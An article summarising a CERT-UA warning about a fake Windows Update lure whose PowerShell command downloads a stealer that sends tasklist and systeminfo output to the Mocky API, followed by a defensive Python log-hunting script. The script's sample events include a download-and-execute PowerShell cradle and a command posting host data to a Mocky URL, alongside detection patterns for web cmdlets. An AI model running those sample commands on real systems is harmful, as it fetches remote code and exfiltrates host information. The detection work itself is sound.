Russian Hackers Exploit False ‘Windows Update’ to Target Government Entities

Victims who fell for the ruse were instructed to run a PowerShell command, ostensibly to update the device. Instead of installing any update, the command downloaded and ran an information stealer. That stealer did not exploit anything; it simply ran the built-in Windows "tasklist" and "systeminfo" commands to collect the list of running processes and a summary of the host configuration, then exfiltrated the output to a Mocky service API endpoint with an HTTP request.

To counter this threat, CERT-UA recommends that IT departments in government institutions restrict the ability to run PowerShell commands on critical devices and monitor network traffic for suspicious activity, in particular connections to the Mocky service API. Mocky is a legitimate public service for hosting mock API responses, so the useful signal is not the destination alone but the combination of an unusual source process (such as PowerShell) contacting it.
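As an added example (not CERT-UA's or the article's own code), the following Python triage script turns the two points above into a hunt over constructed PowerShell script-block (Event ID 4104) and Sysmon network-connection (Event ID 3) records: it flags scripts that run tasklist/systeminfo and send the result over HTTP, flags download-and-execute cradles such as the one the lure asks the victim to run, and flags PowerShell processes connecting to the Mocky API. The Mocky host name (run.mocky.io), every URL and every event below are assumptions or constructed sample data, not indicators taken from the report.

```python
"""Hunt for the described chain (tasklist/systeminfo recon, then an HTTP send to the
Mocky API) in PowerShell script-block (4104) and Sysmon network (3) records.
All sample events are constructed, not real telemetry."""
import re
from urllib.parse import urlparse

# Assumption: the Mocky service API is served under the mocky.io domain.
MOCKY_RE = re.compile(r"(?:^|\.)mocky\.io$", re.IGNORECASE)
RECON_CMDS = ("tasklist", "systeminfo")
# Cmdlets, aliases and .NET types commonly used to fetch or send over HTTP from PowerShell.
WEB_RE = re.compile(
    r"\b(?:Invoke-WebRequest|Invoke-RestMethod|iwr|irm|curl|wget|"
    r"Net\.WebClient|DownloadString|DownloadFile|HttpClient)\b", re.IGNORECASE)
CRADLE_RE = re.compile(r"\b(?:iex|Invoke-Expression)\b", re.IGNORECASE)
POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")


def hosts_in(text):
    """Extract hostnames from URLs embedded in a script block."""
    urls = re.findall(r"https?://[^\s'\"<>()]+", text)
    return [h for h in (urlparse(u).hostname for u in urls) if h]


def assess_script_block(script):
    """Return (severity, reasons) for one 4104 ScriptBlockText value."""
    reasons = []
    recon = [c for c in RECON_CMDS if re.search(rf"\b{c}\b", script, re.IGNORECASE)]
    if recon:
        reasons.append("host recon: " + ", ".join(recon))
    web = bool(WEB_RE.search(script))
    mocky = [h for h in hosts_in(script) if MOCKY_RE.search(h)]
    if mocky:
        reasons.append("contacts Mocky API host: " + ", ".join(mocky))
    cradle = web and bool(CRADLE_RE.search(script))
    if cradle:
        reasons.append("download-and-execute cradle")
    if recon and web and mocky:          # the full chain the report describes
        return "high", reasons
    if (recon and web) or mocky or cradle:
        return "medium", reasons
    return "none", reasons


def assess_network(event):
    """Sysmon Event ID 3: PowerShell talking to the Mocky API is the key indicator."""
    image = event.get("Image", "").lower().rsplit("\\", 1)[-1]
    dest = event.get("DestinationHostname", "")
    if MOCKY_RE.search(dest):
        severity = "high" if image in POWERSHELL_IMAGES else "medium"
        return severity, [f"{image or 'unknown'} -> {dest}:{event.get('DestinationPort')}"]
    return "none", []


def hunt(events):
    """Run both checks over a list of event dicts and return the non-benign findings."""
    findings = []
    for ev in events:
        if ev["EventID"] == 4104:
            severity, reasons = assess_script_block(ev["ScriptBlockText"])
        elif ev["EventID"] == 3:
            severity, reasons = assess_network(ev)
        else:
            continue
        if severity != "none":
            findings.append({"host": ev["Computer"], "event": ev["EventID"],
                             "severity": severity, "reasons": reasons})
    return findings


# Constructed sample events; hostnames and URL paths are placeholders, not real IOCs.
SAMPLE_EVENTS = [
    {"EventID": 4104, "Computer": "ws-01", "ScriptBlockText":
        "iex (New-Object Net.WebClient).DownloadString('https://update-placeholder.example/stage2.ps1')"},
    {"EventID": 4104, "Computer": "ws-01", "ScriptBlockText":
        "$r = (systeminfo | Out-String) + (tasklist | Out-String); "
        "Invoke-RestMethod -Method Post -Uri 'https://run.mocky.io/v3/exfil-placeholder' -Body $r"},
    {"EventID": 4104, "Computer": "ws-02", "ScriptBlockText":
        "Get-Service | Where-Object Status -eq 'Running' | Export-Csv C:\\temp\\svc.csv"},
    {"EventID": 3, "Computer": "ws-01",
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "DestinationHostname": "run.mocky.io", "DestinationPort": 443},
    {"EventID": 3, "Computer": "ws-03",
        "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
        "DestinationHostname": "www.example.com", "DestinationPort": 443},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["host"], f["event"], "; ".join(f["reasons"]))
```

Script-block logging (Event ID 4104) has to be enabled for the first check to see anything, and the source-process check in the Sysmon rule is what separates a developer's browser visiting Mocky from a stealer posting to it.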